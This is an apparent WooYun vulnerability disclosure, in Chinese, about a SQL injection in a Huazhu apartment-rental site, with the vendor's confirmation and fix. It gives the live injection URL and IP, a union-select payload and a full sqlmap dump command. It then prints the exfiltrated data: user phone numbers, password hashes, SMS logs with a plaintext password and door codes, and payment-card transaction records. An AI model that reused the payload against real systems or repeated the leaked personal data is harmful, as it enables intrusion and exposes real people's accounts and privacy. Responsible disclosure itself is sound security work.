漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:华住旗下某公寓租赁平台注入导致整站数据泄露(客户账号密码,短信,支付宝交易记录等)
提交时间:2015-06-10 19:32
修复时间:2015-07-26 09:44
公开时间:2015-07-26 09:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-06-10: 细节已通知厂商并且等待厂商处理中 2015-06-11: 厂商已经确认,细节仅向厂商公开 2015-06-21: 细节向核心白帽子及相关领域专家公开 2015-07-01: 细节向普通白帽子公开 2015-07-11: 细节向实习白帽子公开 2015-07-26: 细节向公众公开
简要描述: RT
详细说明: 注入点 http://218.83.157.75/roomType_ajaxAutoCompleteForArea.do value=1&localtion=3101 and 1=2 union select 1,2,(select count(*) from chengjia.retrievepwd),4,5,6,7,8,9,0,1 -- ;
漏洞证明: 账号密码
➜ sqlmap git:(master) ✗ python sqlmap.py -u "http://218.83.157.75/roomType_ajaxAutoCompleteForArea.do" --data="value=1&localtion=3101" -p localtion -D chengjia -T webuser --dump _ +--------+-----------+-----------+------------+----------------+-----------------+------+------+-------+-------+--------+--------+---------+---------------------+---------+----------+----------+----------+-------------+----------+-----------+-----------+------------+------------+------------+-------------+-------------+--------------+--------------+--------------+------------------------------------------+---------------------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+---------------------+ | roleId | memberId | webUserId | middleName | identityStatus | depositIdentity | city | area | state | email | status | mobile | zipcode | regTime | address | signinIP | province | birthday | userName | lastName | version | firstName | corportate | loginCount | noticeType | lastLoginIP | upgradeTime | mailVerified | withdrawLock | securityFlag | securityCode | lastLoginTime | skipVerifyFlag | securityAnswer | mobileVerified | account_locked | account_expired | account_enabled | securityQuestion | confirmEmailCode | credentials_expired | +--------+-----------+-----------+------------+----------------+-----------------+------+------+-------+-------+--------+--------+---------+---------------------+---------+----------+----------+----------+-------------+----------+-----------+-----------+------------+------------+------------+-------------+-------------+--------------+--------------+--------------+------------------------------------------+---------------------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+---------------------+ | 2 | 006935648 | 1 | NULL | 01 | NULL | NULL | NULL | NULL | NULL | 0 | NULL | NULL | 2014-10-30 17:27:53 | NULL | NULL | NULL | NULL | 13585820668 | NULL | 67 | NULL | NULL | 0 | NULL | <blank> | NULL | 0 | NULL | 0 | a37727626d42ac98c1e9e18b670032dfe79f4320 | 2015-06-01 11:07:11 | 0 | NULL | NULL | \x00 | \x00 | \x01 | NULL | NULL | \x00 | | 2 | 035267604 | 2 | NULL | 01 | NULL | NULL | NULL | NULL | NULL | 0 | NULL | NULL | 2014-10-30 17:28:18 | NULL | NULL | NULL | NULL | 13918617558 | NULL | 61 | NULL | NULL | 0 | NULL | <blank> | NULL | 0 | NULL | 0 | a7a4590210f3e49804cc8205bb7a95490561f192 | 2015-05-18 18:12:54 | 0 | NULL | NULL | \x00 | \x00 | \x01 | NULL | NULL | \x00
短信内容
| NULL | 339 | NULL | longRentPayAgainNotice | 2015-01-04 16:40:05 | NULL | NULL | 尊敬的会员,您的城家网租金需要进行再次支付了。合同号:37473118,入住房间:城家吴中路公寓 (上海市闵行区吴中路699号) 一居室 412号房;请尽快支付,如有疑问,请致电您的管家 021-61842200 | ERROR:发送失败| | 15202129223 | | NULL | 340 | NULL | mobileVerifyCode | 2015-01-05 12:16:30 | NULL | NULL | 您的手机验证码为562631。请妥善保管,请勿转发。 | OK:14204315305368745 | 18616285262 | | NULL | 341 | NULL | registOk | 2015-01-05 12:16:45 | NULL | NULL | 尊敬的会员:欢迎加入城家!您的会员登录名:18616285262 密码:xiejie19861213.城家网提供海量公寓预订,同时可使用此会员名登录华住酒店预订官网。 | OK:14204315455368771 | 18616285262 | | NULL | 342 | NULL | longRentPayAgainNotice | 2015-01-05 16:40:00 | NULL | NULL | 尊敬的会员,您的城家网租金需要进行再次支付了。合同号:37473118,入住房间:城家吴中路公寓 (上海市闵行区吴中路699号) 一居室 412号房;请尽快支付,如有疑问,请致电您的管家 021-61842200 | OK:14204473595244336 | 15202129223 | | NULL | 343 | NULL | longRentPayAgainNotice | 2015-01-06 16:40:00 | NULL | NULL | 尊敬的会员,您的城家网租金需要进行再次支付了。合同号:37473118,入住房间:城家吴中路公寓 (上海市闵行区吴中路699号) 一居室 412号房;请尽快支付,如有疑问,请致电您的管家 021-61842200 | OK:14205337615465343 | 15202129223 | | NULL | 344 | NULL | serviceTmpPassword | 2015-01-07 13:38:37 | NULL | NULL | 服务人员你好,开门密码为05167020,使用有效期5分钟,请妥善保管,请勿外泄; | ERROR:手机号码格式不正确 | <blank> | | NULL | 345 | NULL | serviceTmpPassword | 2015-01-07 13:41:07 | NULL | NULL | 服务人员你好,开门密码为93585031,使用有效期5分钟,请妥善保管,请勿外泄; | ERROR:手机号码格式不正确 | <blank> | +-------+-----------+------+------------------------+---------------------+-----------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+----------------------------------+
支付宝交易记录
Database: chengjia Table: allinpayaccountitem [32 entries] +--------+--------+-------------+-----------------+--------------+----------------------+--------+---------+----------+-----------+-----------+---------------------+---------------------+-------------+---------------------+---------------------+-----------------+ | itemId | fileId | terminal_id | merchant_id | sysNo | payNo | status | transNo | cardType | transFund | transType | transTime | createTime | accountFund | transCardNo | accountDate | transCommission | +--------+--------+-------------+-----------------+--------------+----------------------+--------+---------+----------+-----------+-----------+---------------------+---------------------+-------------+---------------------+---------------------+-----------------+ | 1 | 1 | 00240001 | 821310165130024 | 000118417187 | 3747311801 | 0 | 000008 | 00000 | 1.00 | 1011 | 2014-12-19 16:09:01 | 2015-02-15 10:21:00 | 0.99 | 4380886****32803 | 2014-12-19 00:00:00 | 0.01 | | 2 | 2 | 00240001 | 821310165130024 | 000127512798 | 3621714601 | 0 | 000066 | 00001 | 13200.00 | 1011 | 2015-01-23 10:20:10 | 2015-02-15 10:21:00 | 13107.60 | 6013822000****11860 | 2015-01-23 00:00:00 | 92.40 | | 3 | 2 | 00240001 | 821310165130024 | 000127635453 | 3084603101 | 0 | 000072 | 00000 | 10000.00 | 1011 | 2015-01-23 15:21:26 | 2015-02-15 10:21:00 | 9930.00 | 5176509****68023 | 2015-01-23 00:00:00 | 70.00 | | 4 | 2 | 00240001 | 821310165130024 | 000127637177 | 3351223501 | 0 | 000075 | 00000 | 10000.00 | 1011 | 2015-01-23 15:25:05 | 2015-02-15 10:21:00 | 9930.00 | 4895920****96612 | 2015-01-23 00:00:00 | 70.00 | | 5 | 2 | 00240001 | 821310165130024 | 000127658427 | 3966049001 | 0 | 000114 | 00001 | 9000.00 | 1011 | 2015-01-23 16:11:54 | 2015-02-15 10:21:00 | 8937.00 | 6217920****92515 | 2015-01-23 00:00:00 | 63.00 |
修复方案: 版权声明:转载请注明来源 举起手来 @乌云
漏洞回应 厂商回应: 危害等级:高
漏洞Rank:15
确认时间:2015-06-11 09:42
厂商回复: 谢谢关注,此问题己移交相关团队处理。
最新状态: 2015-06-12:该问题己修复,谢谢!
漏洞评价:
评论
2015-06-11 01:57 |
板凳 ( 路人 | Rank:0 漏洞数:1 | http://www.bandeng.cc)
2015-06-11 10:25 |
我能拒绝么 ( 路人 | Rank:10 漏洞数:3 | 疯爆志林)
2015-09-07 19:15 |
冰无漪 ( 路人 | Rank:29 漏洞数:4 | 寂傲沧溟远,睥越天关,剑殃造劫竞锋寒,祸...)